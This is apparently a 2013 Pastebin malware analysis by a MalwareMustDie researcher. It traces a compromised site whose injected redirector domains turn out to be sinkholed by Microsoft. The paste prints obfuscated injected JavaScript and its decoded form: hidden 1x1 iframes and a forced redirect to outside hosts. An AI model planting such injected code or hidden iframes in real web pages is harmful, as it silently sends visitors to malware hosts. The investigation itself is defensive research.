SHARE
TWEET

Already Sinkholed Infector.. Bad leads from MDL.. sigh..

MalwareMustDie Apr 15th, 2013 142 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie - @unixfreaxjp $ date
  2. // Mon Apr 15 15:04:13 JST 2013
  3. // This is what happened if the old infector domains
  4. // are still listed in the MDL..
  5. // A wasting of time for investigation..
  6. // "またつまらぬ物を切ってしまったなー"
  7.  
  8. // Suspected URL:
  9. http://hicovi.com/
  10.  
  11. // download....
  12.  
  13. --2013-04-15 16:17:41--  http://hicovi.com/
  14. Resolving hicovi.com... 200.57.147.12
  15. Caching hicovi.com => 200.57.147.12
  16. Connecting to hicovi.com|200.57.147.12|:80... connected.
  17.   :
  18. GET / HTTP/1.1
  19. Referer: http://google.com/
  20. User-Agent: We  think, your URL stink...
  21. Host: hicovi.com
  22. HTTP request sent, awaiting response...
  23.   :
  24. HTTP/1.1 200 OK
  25. Content-Length: 13509
  26. Content-Type: text/html
  27. Content-Location: http://hicovi.com/vienepronto.html
  28. Last-Modified: Sun, 14 Nov 2010 20:46:26 GMT
  29. Accept-Ranges: bytes
  30. ETag: "d97b9013d84cb1:d0ce4"
  31. X-Powered-By: ASP.NET
  32. Date: Mon, 15 Apr 2013 07:17:42 GMT
  33.   :
  34. 200 OK
  35. Length: 13509 (13K) [text/html]
  36. Saving to: ‘index.html’
  37. 2013-04-15 16:17:43 (28.4 KB/s) - ‘index.html’ saved [13509/13509]
  38.  
  39. // snapshot..
  40.  cat index.html |grep script
  41. <script src=http://sandraromainass.com/porn-star/wp-links-opml.php ></script> // good one…
  42.  
  43. // these are bads....
  44.  
  45. <script>function uEQTGT(Tly){fff.op.replace("330"); }
  46. </script>
  47. <script>function nme(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(nme()>100000){function eEbKvNHSe(qEMQFOXnKc){ alert('nOBevVbxC');var nwTsnsgjfK = document.getElementById('olXPOWIOd'); }
  48. }</script>
  49. <script>function JODI(){if (navigator.userAgent.indexOf("MSIE")>0) return document.body.clientWidth*document.body.clientHeight;else return window.outerWidth*window.outerHeight;}if(JODI()>100000){function qArhFjyvWg(soEm){var CcySlu=4,vcN=5;var QdlNbSLt='122-2+166-2+153-3+165-3+158-2+164-0+167-1+124-0+167-1+163-1+164-0+111-1+160-4+163-1+153-3+152-0+167-1+158-2+163-1+162-2+123-1+105-3+157-3+167-1+167-1+164-0+120-4+112-0+112-0+165-3+',AMT=QdlNbSLt.split('+');PMoQuQ='';function XKJepVPIJ(c){return String.fromCharCode(c);}for(StgCp=(AMT.length-1);StgCp>=(-0x11+0x1f-0x2-0x8-0xb+0x7);StgCp-=0x29+0x7-0x2f+0x1+0x22-0x23){ mgN=AMT[StgCp].split('-');GalcEbPPSt = parseInt(mgN[0]*vcN)+parseInt(mgN[1]);GalcEbPPSt = parseInt(GalcEbPPSt)/CcySlu;PMoQuQ = XKJepVPIJ(GalcEbPPSt-(0x19-0x14+0x25+0x24+0xe+0x1))+PMoQuQ;}if( PMoQuQ.charCodeAt( PMoQuQ.length-1) == 0)PMoQuQ = PMoQuQ.substring(0, PMoQuQ.length-1);return PMoQuQ.replace(/^\s+|\s+$/g, '');}function fCuF(lTKU){ var Fmlq = document.getElementById('dhgLIn');alert('zPIs');window.eval();alert('zPIs'); }
  50. }</script>
  51.  
  52. // decoded..
  53.  
  54. <iframe width=1 height=1 border=0 frameborder=0 src='http://oughwa.com/in4.php'></iframe>
  55. (repeated 1 time)
  56. <iframe width=1 height=1 border=0 frameborder=0 src='http://hindger.com/in2.php'></iframe>
  57. (repeated 1 time)
  58. <script>top.location = 'http://rascop.com/red2.php';
  59. </script>
  60.  
  61.  
  62. // grabs...
  63.  
  64. // first url got loops...
  65.  
  66. --2013-04-15 16:41:45--  http://oughwa.com/in4.php
  67. Resolving oughwa.com... 199.2.137.133
  68. Caching oughwa.com => 199.2.137.133
  69. Connecting to oughwa.com|199.2.137.133|:80... connected.
  70.    :
  71. GET /in4.php HTTP/1.1
  72. Referer: http://hicovi.com/
  73. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)
  74. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  75. Host: oughwa.com
  76. Connection: Keep-Alive
  77. Accept-Language: en-us,en;q=0.5
  78. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  79. Keep-Alive: 300
  80.   :
  81. HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers.
  82. Retrying.
  83.    :
  84. --2013-04-15 16:41:47--  (try: 2)  http://oughwa.com/in4.php
  85. Found oughwa.com in host_name_addresses_map (0x7f8ccac04990)
  86. Connecting to oughwa.com|199.2.137.133|:80... connected.
  87.    :
  88. GET /in4.php HTTP/1.1
  89. Referer: http://hicovi.com/
  90. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)
  91. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  92. Host: oughwa.com
  93. Connection: Keep-Alive
  94. Accept-Language: en-us,en;q=0.5
  95. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  96. Keep-Alive: 300
  97.   :   // loops...
  98.  
  99.  
  100. // second urls:
  101.  
  102. --2013-04-15 16:45:45--  http://hindger.com/in2.php
  103. Resolving hindger.com... 199.2.137.133
  104. Caching hindger.com => 199.2.137.133
  105. Connecting to hindger.com|199.2.137.133|:80... connected.
  106.   :
  107. GET /in2.php HTTP/1.1
  108. Referer: http://hicovi.com/
  109. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)
  110. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  111. Host: hindger.com
  112. Connection: Keep-Alive
  113. Accept-Language: en-us,en;q=0.5
  114. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  115. Keep-Alive: 300
  116.   :    
  117. HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers.
  118.     // same loops...
  119.  
  120. // third urls..
  121.  
  122. --2013-04-15 16:47:48--  http://rascop.com/red2.php
  123. Resolving rascop.com... 199.2.137.133
  124. Caching rascop.com => 199.2.137.133
  125. Connecting to rascop.com|199.2.137.133|:80... connected.
  126.   :
  127. GET /red2.php HTTP/1.1
  128. Referer: http://hicovi.com/
  129. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)
  130. Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
  131. Host: rascop.com
  132. Connection: Keep-Alive
  133. Accept-Language: en-us,en;q=0.5
  134. Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  135. Keep-Alive: 300
  136.   :
  137. HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers.
  138.    // same loops....
  139.  
  140.  
  141. // Do the simulation & captures..
  142. ( done )
  143. // result.. strange, looks like already in sinkhole or so..
  144.  
  145. // domains investigation...
  146.  
  147. $ cat domain.txt
  148.  
  149. hicovi.com
  150. oughwa.com
  151. hindger.com
  152. rascop.com
  153.  
  154. $ bash check.sh
  155.  
  156. hicovi.com,200.57.147.12,DNS1.TRIARA.COM
  157. DNS2.TRIARA.COM
  158. DNS3.TRIARA.COM
  159. oughwa.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
  160. NS2.MICROSOFTINTERNETSAFETY.NET
  161. hindger.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
  162. NS2.MICROSOFTINTERNETSAFETY.NET
  163. rascop.com,199.2.137.133,NS1.MICROSOFTINTERNETSAFETY.NET
  164. NS2.MICROSOFTINTERNETSAFETY.NET
  165.  
  166.  
  167. // we saw that
  168.  
  169. oughwa.com
  170. hindger.com
  171. rascop.com
  172.  
  173. // is already block.. this explains the badware's alert.
  174.    Domain Name: MICROSOFTINTERNETSAFETY.NET
  175.    Registrar: MARKMONITOR INC.
  176.    Whois Server: whois.markmonitor.com
  177.    Referral URL: http://www.markmonitor.com
  178.  
  179. //where is 199.2.137.133?
  180.   Sprint NETBLK-SPRINT-BLKA (NET-199-0-0-0-1) 199.0.0.0 - 199.3.255.255
  181.   Microsoft Corp FON-3338832128690 (NET-199-2-137-0-1) 199.2.137.0 - 199.2.137.255
  182. // .. in microsoft network... sinkholed....
  183. // google explained: listed at the malwaredomains.com site in September 2011.
  184. // case closed....
  185.  
  186. ---
  187. #MalwareMustDie
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Top